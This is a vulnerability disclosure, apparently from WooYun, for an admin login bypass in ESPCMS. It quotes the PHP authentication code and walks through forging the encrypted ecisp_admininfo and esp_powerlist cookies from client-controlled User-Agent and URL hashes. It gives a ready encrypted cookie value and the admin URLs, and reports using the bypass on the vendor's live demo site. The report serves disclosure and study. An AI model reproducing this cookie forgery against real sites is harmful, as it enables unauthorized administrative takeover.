### 简要描述: ESPCMS 权限限定绕过直接登录后台 仅测试了 最新版本 然后demo测试进去看了一眼,别的什么也没做。 ### 详细说明: 先看下 后台验证的代码 ``` function softbase($admin_purview = false) { header("Content-Type: text/html; charset=utf-8"); $this->dbmysql(); $this->commandinc(); $this->systemfile(); $this->cachedb(); if ($admin_purview) { $this->admin_purview(); $this->sitelng = $this->getlng(); $action = $this->fun->accept('action', 'R'); if (in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) { exit('Permissions errors'); } } if ($this->CON['is_gzip'] == 1 && !function_exists('ob_gzhandler')) { ob_start('ob_gzhandler'); } else { ob_start(); } if ($runpage && $this->CON['is_close']) { exit($this->CON['close_content']); } if (!admin_FROM) { include admin_ROOT . adminfile . '/include/admin_language_' . db_lan . '.php'; $this->lng = $ST; unset($ST); } else { $lngpack = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG; if ($this->creat_lanpack($lngpack)) { include admin_ROOT . 'datacache/' . $lngpack . '_pack.php'; } $this->lng = $LANPACK; $runpage = true; } } ``` 调用了下面的函数。 $this->admin_purview(); 然后继续查看代码 ``` function admin_purview() { if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = false; } else { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = true; } $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)); $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE', db_pscode)); list($esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $esp_powerid, $esp_inputclassid, $this->esp_softurl) = $arr_purview; $this->esp_adminuserid = intval($esp_adminuserid); $this->esp_inputclassid = intval($esp_inputclassid); 
$this->esp_powerid = intval($esp_powerid); if ($gettype) { if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) { $condition = 0; } else { $condition = 1; } } else { if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) { $condition = 0; } else { $condition = 1; } } if ($condition == 0) { if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') { header('location: index.php?archive=adminuser&action=login'); exit(); } } else { if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') { header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter'); exit(); } } } ``` 然后重点验证的是下面的代码 ``` if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) ``` $this->esp_username和$this->esp_adminuserid 可以在cookies中伪造。 而后面的 两个常量如下 ``` admin_AGENT define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']); admin_ClassURL define('admin_ClassURL', 'http://' . $_SERVER['HTTP_HOST'] . substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/')) . 
'/'); ``` 可见,这两个常量分别取自请求头 User-Agent 与 Host/PHP_SELF,均由客户端控制,其 md5 值可被请求方自行计算,因此同样可以伪造。 再来说下查看key 直接可以看索马里大牛的http://wooyun.org/bugs/wooyun-2010-062528 这里就不多说了。 来张截图进行下示例。 [<img src="https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png) 出来之后 然后挨个进行 加密解密测试。 最终可以得出key ### 漏洞证明: 下面我们开始伪造 cookies中ecisp_admininfo的加密前值如下。 ``` 1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL) ``` 下面我拿测试用的agent和classurl进行演示 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 md5 之后 efdd8e8dfc89de8875254f2e96f2eeb2 http://192.168.1.107/adminsoft md5 之后 962c6fbd63e97c6d6db74449a6bef874 password 字段在 admin_purview() 中并未与数据库比对,随便输入个wooyun md5 之后 fbb204a4061ffbd41284a84c258c1bfb 然后填充进去 ``` 1|admin|fbb204a4061ffbd41284a84c258c1bfb|efdd8e8dfc89de8875254f2e96f2eeb2|1|1|962c6fbd63e97c6d6db74449a6bef874 ``` 加密 ``` Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo ``` 然后我们可以得出cookies的设定值 ecisp_admininfo 设定为 Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo esp_powerlist 设定为 all 的加密lp-i managementloglistpgid 设定为0 managementmangerlistpgid 设定为0 开始进行伪造管理员 我们先打开 ``` http://192.168.1.107/adminsoft/index.php ``` 这个页面 然后开始填充cookies [<img src="https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png) 然后访问下面的url ``` http://192.168.1.107/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter ``` [<img src="https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png" alt="图片3.png" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png) 好了下面我们来说下demo的 先注册个帐号。 [<img src="https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png) 然后反复进行加密解密测试,获得key b16dd02887<马赛克>eabab<马赛克> 然后我们访问 ``` http://demo.ecisp.cn/adminsoft ``` 再生成cookies 访问 ``` http://demo.ecisp.cn/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter ``` [<img src="https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png)